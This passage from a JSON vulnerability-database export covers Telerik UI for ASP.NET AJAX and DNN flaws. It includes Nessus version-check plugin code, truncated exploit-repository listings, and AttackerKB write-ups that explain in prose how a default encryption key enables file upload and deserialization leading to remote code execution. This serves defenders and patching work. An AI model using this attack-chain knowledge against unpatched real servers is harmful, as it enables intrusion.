script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dotnetnuke:dotnetnuke\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"dotnetnuke_detect.nasl\");\n script_require_keys(\"installed_sw/DNN\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\napp = 'DNN';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, asp:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '3.1.0', 'max_version' : '9.5.0', 'fixed_version' : '9.6.0' },\n { 'min_version' : '5.0.0', 'max_version' : '9.5.0', 'fixed_version' : '9.6.0' },\n { 'min_version' : '6.0.0', 'max_version' : '9.5.0', 'fixed_version' : '9.6.0' },\n { 'min_version' : '7.0.0', 'max_version' : '9.5.0', 'fixed_version' : '9.6.0' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T16:20:54", "description": "According to its self-reported version number, the version of Telerik UI for ASP.NET is affected by a cryptographic weakness.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-07-01T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX Cryptographic Weakness", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9248"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:telerik:ui_for_asp.net_ajax:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112523", "href": "https://www.tenable.com/plugins/was/112523", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:25:18", "description": "The version of Telerik UI for ASP.NET AJAX installed on the remote Windows host is affected by a cryptographic weakness in Telerik.Web.UI.dll. An unauthenticated, remote attacker can exploit this, via specially crafted data, to disclose encryption keys.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "Telerik UI for ASP.NET AJAX Cryptographic Weakness", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9248"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:telerik:ui_for_asp.net_ajax"], "id": "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2017-9248.NASL", "href": "https://www.tenable.com/plugins/nessus/101159", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101159);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-9248\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Telerik UI for ASP.NET AJAX Cryptographic Weakness\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application development suite installed on the Windows remote\nhost is affected by a cryptographic weakness.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Telerik UI for ASP.NET AJAX installed on the remote\nWindows host is affected by a cryptographic weakness in\nTelerik.Web.UI.dll. An unauthenticated, remote attacker can exploit\nthis, via specially crafted data, to disclose encryption keys.\");\n # https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4efdcfeb\");\n # http://www.telerik.com/support/whats-new/aspnet-ajax/release-history/ui-for-asp-net-ajax-r2-2017-sp1-version-2017-2-621\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3e5e7456\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Telerik UI for ASP.NET AJAX version R2 2017 SP1\n(2017.2.621) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-9248\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:telerik:ui_for_asp.net_ajax\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"telerik_ui_for_aspnet_ajax_installed.nbin\");\n script_require_keys(\"installed_sw/Telerik UI for ASP.NET AJAX\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\n\nfunction display_dword (dword, nox)\n{\n local_var tmp;\n\n if (isnull(nox) || (nox == FALSE))\n tmp = \"0x\";\n else\n tmp = \"\";\n\n return string (tmp,\n toupper(\n hexstr(\n raw_string(\n (dword >>> 24) & 0xFF,\n (dword >>> 16) & 0xFF,\n (dword >>> 8) & 0xFF,\n dword & 0xFF\n )\n )\n )\n );\n}\n\napp_name = \"Telerik UI for ASP.NET AJAX\";\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\nweb_ui_dll = install['web_ui_dll'];\n\n# 2017.2.621 and later is patched\nif (ver_compare(ver:version, fix:\"2017.2.621\", strict:FALSE) >= 0)\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n\n# 2013.1.220 to 2017.2.503 have patches\n# 2011.1.315 to 2012.3.1308 might have patches\nif (((ver_compare(ver:version, fix:\"2013.1.220\", strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:\"2017.2.503\", strict:FALSE) <= 0))\n ||\n ((ver_compare(ver:version, fix:\"2011.1.315\", strict:FALSE) >= 0) &&\n (ver_compare(ver:version, fix:\"2012.3.1308\", strict:FALSE) <= 0)))\n{\n # check for \"Telerik.Web.UI.Patch\" in the File Description\n\n # Connect to the appropriate share.\n port = kb_smb_transport();\n login = kb_smb_login();\n pass = kb_smb_password();\n domain = kb_smb_domain();\n\n if (!smb_session_init())\n audit(AUDIT_FN_FAIL, \"smb_session_init\");\n\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:web_ui_dll);\n dll = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\", string:web_ui_dll);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n }\n\n fh = CreateFile(\n file:dll,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n\n file_description = NULL;\n if (!isnull(fh))\n {\n ret = GetFileVersionEx(handle:fh);\n if (!isnull(ret)) children = ret['Children'];\n if (!isnull(children))\n {\n varfileinfo = children['VarFileInfo'];\n if (!isnull(varfileinfo))\n {\n translation =\n (get_word (blob:varfileinfo['Translation'], pos:0) << 16) +\n get_word (blob:varfileinfo['Translation'], pos:2);\n translation = tolower(display_dword(dword:translation, nox:TRUE));\n }\n stringfileinfo = children['StringFileInfo'];\n if (!isnull(stringfileinfo) && !isnull(translation))\n {\n data = stringfileinfo[translation];\n if (!isnull(data)) file_description = data['FileDescription'];\n else\n {\n data = stringfileinfo[toupper(translation)];\n if (!isnull(data)) file_description = data['FileDescription'];\n }\n }\n }\n CloseFile(handle:fh);\n }\n NetUseDel();\n\n if (empty_or_null(file_description))\n exit(1, \"Failed to get the file description of \" + web_ui_dll + \".\");\n\n if (file_description == \"Telerik.Web.UI.Patch\")\n exit(0, app_name + \" version \" + version + ' has the vendor supplied patch installed that changes the file description to \"Telerik.Web.UI.Patch\".');\n}\n\n# if we get this far, we're vulnerable\nport = get_kb_item(\"SMB/transport\");\nif (empty_or_null(port))\n port = 445;\n\nreport = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", \"2017.2.621.0 or vendor supplied patch\"\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n);\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-29T23:42:45", "description": "# RAU_crypto\n[![Language](https://img.shields.io/badge/Lang-Pyth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-09T13:53:57", "type": "githubexploit", "title": "Exploit for Inadequate Encryption Strength in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935", "CVE-2017-9248", "CVE-2017-11317", "CVE-2017-11357"], "modified": "2021-12-29T14:28:46", "id": "46B4DA3A-0DEC-5F0E-980A-B17A1CB688F1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# RAU_crypto\n[![Language](https://img.shields.io/badge/Lang-Pyth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-05-29T07:29:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357", "CVE-2019-18935", "CVE-2017-11317", "CVE-2017-9248"], "modified": "2022-02-07T03:27:52", "id": "6AF629CA-DC22-5740-AC2B-CA18189D299D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:16", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-25T08:37:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-08-17T19:04:54", "id": "05081BAE-6AEB-5206-8BEC-6D067EE4B660", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-12T02:57:38", "description": "<b>[CVE-2019-18935] Telerik UI for ASP.NET AJAX (RadAsyncUpload ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-19T17:11:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-01-09T21:20:03", "id": "1741E720-F85A-5179-AB8A-D6FA2E185092", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:34:15", "description": "# TelerikUI Python Scanner\r\n(telerik_rce_scan.py)\r\n<img align=\"c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-26T20:57:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-07-21T15:53:50", "id": "92BBBF7B-026E-553A-883B-AEF503046C18", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-09T01:53:05", "description": "# CVE-2019-18935\n\nProof-of-concept exploit for a .NET JSON deser...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-12T07:58:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2022-08-08T17:58:54", "id": "A04C30E0-722D-5CF4-B80A-547C1C702024", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-01-18T20:32:04", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 05, 2020 6:37pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**ccondon-r7** at October 13, 2020 4:47pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\n**gwillcox-r7** at October 20, 2020 6:59pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "attackerkb", "title": "CVE-2019-18935", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "modified": "2021-07-27T00:00:00", "id": "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "href": "https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T23:28:11", "description": "An issue was discovered in Quest KACE Desktop Authority before 11.2. This vulnerability allows attackers to execute remote code through a deserialization exploitation in the RadAsyncUpload function of ASP.NET AJAX. An attacker can leverage this vulnerability when the encryption keys are known (due to the presence of CVE-2017-11317, CVE-2017-11357, or other means). A default setting for the type whitelisting feature in more current versions of ASP.NET AJAX prevents exploitation.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-44029", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2021-44029"], "modified": "2022-01-10T00:00:00", "id": "AKB:A6C918C9-3E53-4E56-AE61-3832C73F821D", "href": "https://attackerkb.com/topics/VA7jz1STSt/cve-2021-44029", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-01T00:22:48", "description": "Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-07-03T00:00:00", "type": "attackerkb", "title": "CVE-2017-9248", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2020-06-05T00:00:00", "id": "AKB:F65287D3-DA1A-4B44-BDB0-9E3210398F75", "href": "https://attackerkb.com/topics/haGug1Zajy/cve-2017-9248", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T02:01:29", "description": "Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-23T00:00:00", "type": "attackerkb", "title": "CVE-2017-11317", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 